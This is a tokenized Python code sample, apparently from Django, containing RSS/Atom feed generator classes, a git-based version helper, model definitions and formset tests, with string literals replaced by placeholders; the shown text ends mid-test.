'<STR_LIT:id>' : feed_guid or link , <EOL> '<STR_LIT>' : ttl , <EOL> } <EOL> self . feed . update ( kwargs ) <EOL> self . items = [ ] <EOL> def add_item ( self , title , link , description , author_email = None , <EOL> author_name = None , author_link = None , pubdate = None , comments = None , <EOL> unique_id = None , enclosure = None , categories = ( ) , item_copyright = None , <EOL> ttl = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> to_unicode = lambda s : force_text ( s , strings_only = True ) <EOL> if categories : <EOL> categories = [ to_unicode ( c ) for c in categories ] <EOL> if ttl is not None : <EOL> ttl = force_text ( ttl ) <EOL> item = { <EOL> '<STR_LIT:title>' : to_unicode ( title ) , <EOL> '<STR_LIT>' : iri_to_uri ( link ) , <EOL> '<STR_LIT:description>' : to_unicode ( description ) , <EOL> '<STR_LIT>' : to_unicode ( author_email ) , <EOL> '<STR_LIT>' : to_unicode ( author_name ) , <EOL> '<STR_LIT>' : iri_to_uri ( author_link ) , <EOL> '<STR_LIT>' : pubdate , <EOL> '<STR_LIT>' : to_unicode ( comments ) , <EOL> '<STR_LIT>' : to_unicode ( unique_id ) , <EOL> '<STR_LIT>' : enclosure , <EOL> '<STR_LIT>' : categories or ( ) , <EOL> '<STR_LIT>' : to_unicode ( item_copyright ) , <EOL> '<STR_LIT>' : ttl , <EOL> } <EOL> item . update ( kwargs ) <EOL> self . items . append ( item ) <EOL> def num_items ( self ) : <EOL> return len ( self . items ) <EOL> def root_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def add_root_elements ( self , handler ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def item_attributes ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def add_item_elements ( self , handler , item ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def write ( self , outfile , encoding ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def writeString ( self , encoding ) : <EOL> """<STR_LIT>""" <EOL> s = StringIO ( ) <EOL> self . write ( s , encoding ) <EOL> return s . getvalue ( ) <EOL> def latest_post_date ( self ) : <EOL> """<STR_LIT>""" <EOL> updates = [ i [ '<STR_LIT>' ] for i in self . items if i [ '<STR_LIT>' ] is not None ] <EOL> if len ( updates ) > <NUM_LIT:0> : <EOL> updates . sort ( ) <EOL> return updates [ - <NUM_LIT:1> ] <EOL> else : <EOL> return datetime . datetime . now ( ) <EOL> class Enclosure ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , url , length , mime_type ) : <EOL> "<STR_LIT>" <EOL> self . length , self . mime_type = length , mime_type <EOL> self . url = iri_to_uri ( url ) <EOL> class RssFeed ( SyndicationFeed ) : <EOL> mime_type = '<STR_LIT>' <EOL> def write ( self , outfile , encoding ) : <EOL> handler = SimplerXMLGenerator ( outfile , encoding ) <EOL> handler . startDocument ( ) <EOL> handler . startElement ( "<STR_LIT>" , self . rss_attributes ( ) ) <EOL> handler . startElement ( "<STR_LIT>" , self . root_attributes ( ) ) <EOL> self . add_root_elements ( handler ) <EOL> self . write_items ( handler ) <EOL> self . endChannelElement ( handler ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def rss_attributes ( self ) : <EOL> return { "<STR_LIT:version>" : self . _version , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> def write_items ( self , handler ) : <EOL> for item in self . items : <EOL> handler . startElement ( '<STR_LIT>' , self . item_attributes ( item ) ) <EOL> self . add_item_elements ( handler , item ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def add_root_elements ( self , handler ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , self . feed [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT:description>" , self . feed [ '<STR_LIT:description>' ] ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> for cat in self . feed [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , cat ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc2822_date ( self . latest_post_date ( ) ) ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> def endChannelElement ( self , handler ) : <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> class RssUserland091Feed ( RssFeed ) : <EOL> _version = "<STR_LIT>" <EOL> def add_item_elements ( self , handler , item ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , item [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT:description>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:description>" , item [ '<STR_LIT:description>' ] ) <EOL> class Rss201rev2Feed ( RssFeed ) : <EOL> _version = "<STR_LIT>" <EOL> def add_item_elements ( self , handler , item ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , item [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT:description>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:description>" , item [ '<STR_LIT:description>' ] ) <EOL> if item [ "<STR_LIT>" ] and item [ "<STR_LIT>" ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" % ( item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] ) ) <EOL> elif item [ "<STR_LIT>" ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ "<STR_LIT>" ] ) <EOL> elif item [ "<STR_LIT>" ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ "<STR_LIT>" ] , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc2822_date ( item [ '<STR_LIT>' ] ) ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , '<STR_LIT>' , <EOL> { "<STR_LIT:url>" : item [ '<STR_LIT>' ] . url , "<STR_LIT>" : item [ '<STR_LIT>' ] . length , <EOL> "<STR_LIT:type>" : item [ '<STR_LIT>' ] . mime_type } ) <EOL> for cat in item [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , cat ) <EOL> class Atom1Feed ( SyndicationFeed ) : <EOL> mime_type = '<STR_LIT>' <EOL> ns = "<STR_LIT>" <EOL> def write ( self , outfile , encoding ) : <EOL> handler = SimplerXMLGenerator ( outfile , encoding ) <EOL> handler . startDocument ( ) <EOL> handler . startElement ( '<STR_LIT>' , self . root_attributes ( ) ) <EOL> self . add_root_elements ( handler ) <EOL> self . write_items ( handler ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def root_attributes ( self ) : <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> return { "<STR_LIT>" : self . ns , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } <EOL> else : <EOL> return { "<STR_LIT>" : self . ns } <EOL> def add_root_elements ( self , handler ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , self . feed [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } ) <EOL> handler . addQuickElement ( "<STR_LIT:id>" , self . feed [ '<STR_LIT:id>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc3339_date ( self . latest_post_date ( ) ) ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . startElement ( "<STR_LIT>" , { } ) <EOL> handler . addQuickElement ( "<STR_LIT:name>" , self . feed [ '<STR_LIT>' ] ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:email>" , self . feed [ '<STR_LIT>' ] ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> for cat in self . feed [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : cat } ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> def write_items ( self , handler ) : <EOL> for item in self . items : <EOL> handler . startElement ( "<STR_LIT>" , self . item_attributes ( item ) ) <EOL> self . add_item_elements ( handler , item ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def add_item_elements ( self , handler , item ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , item [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : item [ '<STR_LIT>' ] , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc3339_date ( item [ '<STR_LIT>' ] ) ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . startElement ( "<STR_LIT>" , { } ) <EOL> handler . addQuickElement ( "<STR_LIT:name>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:email>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> unique_id = item [ '<STR_LIT>' ] <EOL> else : <EOL> unique_id = get_tag_uri ( item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT:id>" , unique_id ) <EOL> if item [ '<STR_LIT:description>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT:description>' ] , { "<STR_LIT:type>" : "<STR_LIT:html>" } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : item [ '<STR_LIT>' ] . url , <EOL> "<STR_LIT>" : item [ '<STR_LIT>' ] . length , <EOL> "<STR_LIT:type>" : item [ '<STR_LIT>' ] . mime_type } ) <EOL> for cat in item [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : cat } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> DefaultFeed = Rss201rev2Feed </s>
<s> from __future__ import unicode_literals <EOL> import datetime <EOL> import os <EOL> import subprocess <EOL> def get_version ( version = None ) : <EOL> "<STR_LIT>" <EOL> if version is None : <EOL> from django import VERSION as version <EOL> else : <EOL> assert len ( version ) == <NUM_LIT:5> <EOL> assert version [ <NUM_LIT:3> ] in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> parts = <NUM_LIT:2> if version [ <NUM_LIT:2> ] == <NUM_LIT:0> else <NUM_LIT:3> <EOL> main = '<STR_LIT:.>' . join ( str ( x ) for x in version [ : parts ] ) <EOL> sub = '<STR_LIT>' <EOL> if version [ <NUM_LIT:3> ] == '<STR_LIT>' and version [ <NUM_LIT:4> ] == <NUM_LIT:0> : <EOL> git_changeset = get_git_changeset ( ) <EOL> if git_changeset : <EOL> sub = '<STR_LIT>' % git_changeset <EOL> elif version [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> mapping = { '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:b>' , '<STR_LIT>' : '<STR_LIT:c>' } <EOL> sub = mapping [ version [ <NUM_LIT:3> ] ] + str ( version [ <NUM_LIT:4> ] ) <EOL> return str ( main + sub ) <EOL> def get_git_changeset ( ) : <EOL> """<STR_LIT>""" <EOL> repo_dir = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> git_log = subprocess . Popen ( '<STR_LIT>' , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> shell = True , cwd = repo_dir , universal_newlines = True ) <EOL> timestamp = git_log . communicate ( ) [ <NUM_LIT:0> ] <EOL> try : <EOL> timestamp = datetime . datetime . utcfromtimestamp ( int ( timestamp ) ) <EOL> except ValueError : <EOL> return None <EOL> return timestamp . strftime ( '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import <EOL> from django . core . exceptions import FieldError <EOL> from django . test import TestCase <EOL> from django . utils import six <EOL> from . models import Author , Article <EOL> class CustomColumnsTests ( TestCase ) : <EOL> def test_db_column ( self ) : <EOL> a1 = Author . objects . create ( first_name = "<STR_LIT>" , last_name = "<STR_LIT>" ) <EOL> a2 = Author . objects . create ( first_name = "<STR_LIT>" , last_name = "<STR_LIT>" ) <EOL> art = Article . objects . create ( headline = "<STR_LIT>" ) <EOL> art . authors = [ a1 , a2 ] <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . all ( ) , [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> ] , <EOL> six . text_type <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( first_name__exact = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> six . text_type <EOL> ) <EOL> self . assertEqual ( <EOL> Author . objects . get ( first_name__exact = "<STR_LIT>" ) , <EOL> a1 , <EOL> ) <EOL> self . assertRaises ( FieldError , <EOL> lambda : Author . objects . filter ( firstname__exact = "<STR_LIT>" ) <EOL> ) <EOL> a = Author . objects . get ( last_name__exact = "<STR_LIT>" ) <EOL> a . first_name = "<STR_LIT>" <EOL> a . last_name = "<STR_LIT>" <EOL> self . assertRaises ( AttributeError , lambda : a . firstname ) <EOL> self . assertRaises ( AttributeError , lambda : a . last ) <EOL> self . assertQuerysetEqual ( <EOL> art . authors . all ( ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> six . text_type <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> a . article_set . all ( ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda a : a . headline <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> art . authors . filter ( last_name = '<STR_LIT>' ) , [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> six . text_type <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateField ( ) <EOL> expire_date = models . DateField ( ) <EOL> class Meta : <EOL> get_latest_by = '<STR_LIT>' <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> @ python_2_unicode_compatible <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> birthday = models . DateField ( ) <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import datetime <EOL> import re <EOL> from datetime import date <EOL> from decimal import Decimal <EOL> from django import forms <EOL> from django . db import models <EOL> from django . forms . models import ( _get_foreign_key , inlineformset_factory , <EOL> modelformset_factory ) <EOL> from django . test import TestCase , skipUnlessDBFeature <EOL> from django . utils import six <EOL> from . models import ( Author , BetterAuthor , Book , BookWithCustomPK , <EOL> BookWithOptionalAltEditor , AlternateBook , AuthorMeeting , CustomPrimaryKey , <EOL> Place , Owner , Location , OwnerProfile , Restaurant , Product , Price , <EOL> MexicanRestaurant , ClassyMexicanRestaurant , Repository , Revision , <EOL> Person , Membership , Team , Player , Poet , Poem , Post ) <EOL> class DeletionTests ( TestCase ) : <EOL> def test_deletion ( self ) : <EOL> PoetFormSet = modelformset_factory ( Poet , can_delete = True ) <EOL> poet = Poet . objects . create ( name = '<STR_LIT:test>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : str ( poet . pk ) , <EOL> '<STR_LIT>' : '<STR_LIT:test>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> formset . save ( ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> def test_add_form_deletion_when_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> PoetFormSet = modelformset_factory ( Poet , can_delete = True ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:x>' * <NUM_LIT:1000> , <EOL> } <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , False ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , True ) <EOL> formset . save ( ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> def test_change_form_deletion_when_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> PoetFormSet = modelformset_factory ( Poet , can_delete = True ) <EOL> poet = Poet . objects . create ( name = '<STR_LIT:test>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : six . text_type ( poet . id ) , <EOL> '<STR_LIT>' : '<STR_LIT:x>' * <NUM_LIT:1000> , <EOL> } <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , False ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:1> ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , True ) <EOL> formset . save ( ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> class ModelFormsetTest ( TestCase ) : <EOL> def test_simple_save ( self ) : <EOL> qs = Author . objects . all ( ) <EOL> AuthorFormSet = modelformset_factory ( Author , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> author1 , author2 = saved <EOL> self . assertEqual ( author1 , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> self . assertEqual ( author2 , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> authors = list ( Author . objects . order_by ( '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( authors , [ author2 , author1 ] ) <EOL> qs = Author . objects . order_by ( '<STR_LIT:name>' ) <EOL> AuthorFormSet = modelformset_factory ( Author , extra = <NUM_LIT:1> , can_delete = False ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' % author2 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' % author1 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> author3 = saved [ <NUM_LIT:0> ] <EOL> self . assertEqual ( author3 , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> authors = list ( Author . objects . order_by ( '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( authors , [ author2 , author1 , author3 ] ) <EOL> qs = Author . objects . order_by ( '<STR_LIT:name>' ) <EOL> AuthorFormSet = modelformset_factory ( Author , extra = <NUM_LIT:1> , can_delete = True ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:4> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % author2 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % author1 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % author3 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:3> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . save ( ) , [ ] ) <EOL> authors = list ( Author . objects . order_by ( '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( authors , [ author2 , author1 , author3 ] ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( saved [ <NUM_LIT:0> ] , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> def test_commit_false ( self ) : <EOL> author1 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author2 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author3 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> meeting = AuthorMeeting . objects . create ( created = date . today ( ) ) <EOL> meeting . authors = Author . objects . all ( ) <EOL> author4 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> AuthorMeetingFormSet = modelformset_factory ( AuthorMeeting , extra = <NUM_LIT:1> , can_delete = True ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( meeting . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ author2 . id , author1 . id , author3 . id , author4 . id ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorMeetingFormSet ( data = data , queryset = AuthorMeeting . objects . all ( ) ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> instances = formset . save ( commit = False ) <EOL> for instance in instances : <EOL> instance . created = date . today ( ) <EOL> instance . save ( ) <EOL> formset . save_m2m ( ) <EOL> self . assertQuerysetEqual ( instances [ <NUM_LIT:0> ] . authors . all ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_max_num ( self ) : <EOL> author1 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author2 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author3 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> qs = Author . objects . order_by ( '<STR_LIT:name>' ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = None , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:6> ) <EOL> self . assertEqual ( len ( formset . extra_forms ) , <NUM_LIT:3> ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:4> , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( len ( formset . extra_forms ) , <NUM_LIT:1> ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:0> , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( formset . extra_forms ) , <NUM_LIT:0> ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = None ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertQuerysetEqual ( formset . get_queryset ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:0> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . 